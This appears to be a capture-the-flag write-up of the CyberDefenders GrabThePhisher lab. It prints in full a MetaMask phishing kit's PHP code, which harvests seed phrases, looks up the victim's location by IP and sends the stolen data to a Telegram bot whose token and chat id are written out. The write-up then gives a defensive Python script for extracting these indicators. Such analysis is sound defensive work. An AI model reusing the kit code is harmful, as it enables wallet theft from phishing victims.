Solution
Hi,
Recently I finished the GrabThePhisher challenge on cyberdefenders.org. Let's walk through how to solve its questions.
#1 Which wallet is used for asking the seed phrase?
The phishing site displays 3 wallets:
I checked the structure of the website directory. Only one directory contained a suspicious PHP script:
c75-GrabThePhisher\pankewk\metamask\metamask.php
#2 What is the file name that has the code for the phishing kit?
The suspicious file contains a script written in PHP that gathers intelligence and data from the user.
#3 In which language was the kit written?
The script is written in PHP.
#4 What service does the kit use to retrieve the victim's machine information?
Code of the script:
<?php
$request = file_get_contents("http://api.sypexgeo.net/json/".$_SERVER['REMOTE_ADDR']);
$array = json_decode($request);
$geo = $array->country->name_en;
$city = $array->city->name_en;
$date = date("m.d.Y"); //aaja
/*
With love and respect to all the hustler out there,
This is a small gift to my brothers,
All the best with your luck,
Regards,
j1j1b1s@m3r0
*/
$message = "<b>Welcome 2 The Jungle </b>
<b>Wallet:</b> Metamask
<b>Phrase:</b> <code>" . $_POST["data"] . "</code>
<b>IP:</b> " .$_SERVER['REMOTE_ADDR'] . " | " .$geo. " | " .$city. "
<b>User:</b> " . $_SERVER['HTTP_USER_AGENT'] . "";
sendTel($message);
function sendTel($message){
    // Telegram chat id and bot token: the exfiltration channel for the stolen phrase
    $id = "5442785564";
    $token = "5457463144:AAG8t4k7e2ew3tTi0IBShcWbSia0Irvxm10";
    $filename = "https://api.telegram.org/bot".$token."/sendMessage?chat_id=".$id."&text=".urlencode($message)."&parse_mode=html";
    file_get_contents($filename);
    // Second copy of the submitted phrase is appended to a local log under the web root
    $_POST["import-account__secret-phrase"]. $text = $_POST['data']."\n";;
    @file_put_contents($_SERVER['DOCUMENT_ROOT'].'/log/'.'log.txt', $text, FILE_APPEND);
}
?>
Line 3 shows that the phisher uses the Sypex Geo service (api.sypexgeo.net) to gather intelligence about the victim's location from the request IP:
$request = file_get_contents("http://api.sypexgeo.net/json/".$_SERVER['REMOTE_ADDR']);
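As an added example (my own triage helper, not part of the writeup or the kit), here is a short Python script that statically pulls the indicators a responder wants out of a handler like metamask.php: the POST fields it harvests, the geo-IP host fed with REMOTE_ADDR, the Telegram bot token and chat id used as the exfiltration channel, and the local log path. The embedded sample is a constructed copy of the kit's shape with placeholder credentials.

```python
import re

# Simple `$name = "literal";` assignments, so that indirections such as
# chat_id=".$id." can be reported as their literal value.
ASSIGN_RE = re.compile(r'\$(\w+)\s*=\s*["\']([^"\']*)["\']\s*;')
POST_RE = re.compile(r'\$_POST\[["\']([^"\']+)["\']\]')
# External lookup whose URL is built from the victim's REMOTE_ADDR (geo-IP enrichment).
GEO_RE = re.compile(r'file_get_contents\(\s*["\']https?://([^/"\']+)[^"\']*["\']\s*\.\s*'
                    r'\$_SERVER\[["\']REMOTE_ADDR["\']\]')
TELEGRAM_RE = re.compile(r'api\.telegram\.org/bot["\']\s*\.\s*\$(\w+)')
CHAT_RE = re.compile(r'chat_id=["\']\s*\.\s*\$(\w+)')
LOG_RE = re.compile(r'file_put_contents\((.*?),\s*\$\w+\s*,\s*FILE_APPEND\)')


def triage_kit(source: str) -> dict:
    """Extract exfiltration and logging indicators from a kit's PHP handler."""
    literals = dict(ASSIGN_RE.findall(source))
    geo, tg, chat, log = (p.search(source) for p in (GEO_RE, TELEGRAM_RE, CHAT_RE, LOG_RE))
    log_path = None
    if log:
        # Rebuild the path from its quoted fragments; DOCUMENT_ROOT is shown symbolically.
        expr = re.sub(r'\$_SERVER\[["\']DOCUMENT_ROOT["\']\]', '"<docroot>"', log.group(1))
        log_path = "".join(re.findall(r'["\']([^"\']*)["\']', expr))
    return {
        "post_fields": sorted(set(POST_RE.findall(source))),
        "geoip_host": geo.group(1) if geo else None,
        "telegram_token": literals.get(tg.group(1)) if tg else None,
        "telegram_chat_id": literals.get(chat.group(1)) if chat else None,
        "log_path": log_path,
    }


# Constructed sample shaped like the kit above, with placeholder credentials.
SAMPLE_KIT = r'''<?php
$request = file_get_contents("http://api.sypexgeo.net/json/".$_SERVER['REMOTE_ADDR']);
$message = "<b>Phrase:</b> <code>" . $_POST["data"] . "</code>";
sendTel($message);
function sendTel($message){
$id = "1234567890";
$token = "123456789:AAPlaceholderTokenForTriageOnly";
$filename = "https://api.telegram.org/bot".$token."/sendMessage?chat_id=".$id."&text=".urlencode($message);
file_get_contents($filename);
$_POST["import-account__secret-phrase"]. $text = $_POST['data']."\n";;
@file_put_contents($_SERVER['DOCUMENT_ROOT'].'/log/'.'log.txt', $text, FILE_APPEND);
}
?>'''

if __name__ == "__main__":
    for key, value in triage_kit(SAMPLE_KIT).items():
        print(f"{key}: {value}")
```

Run it against every PHP file in a seized kit directory and the extracted chat id and bot token are what you report to Telegram for takedown, while the log path tells you where victim submissions were stored on the host.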
